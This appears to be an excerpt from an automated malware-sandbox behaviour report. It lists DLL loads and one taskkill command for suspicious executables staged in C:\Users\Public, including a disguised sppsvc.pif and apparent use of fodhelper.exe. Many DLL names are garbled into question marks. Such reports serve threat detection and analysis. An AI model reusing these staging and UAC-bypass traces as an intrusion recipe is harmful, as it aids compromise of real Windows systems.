Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Users\Public\xkn.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: ieframe.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: mlang.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: policymanager.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: msvcp110_win.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: twinui.appcore.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: execmodelproxy.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: mrmcorer.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: windows.staterepositorycore.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: windows.ui.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: windowmanagementapi.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: inputhost.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: twinapi.appcore.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: twinapi.appcore.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\System32\fodhelper.exe	Section loaded: bcp47mrm.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: systemsettingsthresholdadminflowui.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: newdev.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: dui70.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: logoncli.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: dismapi.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: timesync.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: samcli.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: wtsapi32.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: appxdeploymentclient.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: winbrand.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: dismapi.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: wincorlib.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: devobj.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: devrtl.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: settingshandlers_nt.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: policymanager.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: errordetailscore.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: msvcp110_win.dll			Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe	Section loaded: windows.staterepositorycore.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll			Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe	Section loaded: version.dll
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\kn.exe	Section loaded: profapi.dll
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe	Section loaded: version.dll
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: version.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: archiveint.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: url.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: mapi32.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???y.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???y.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???y.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???2.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???2.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???2.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??????s.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??????s.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??????s.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
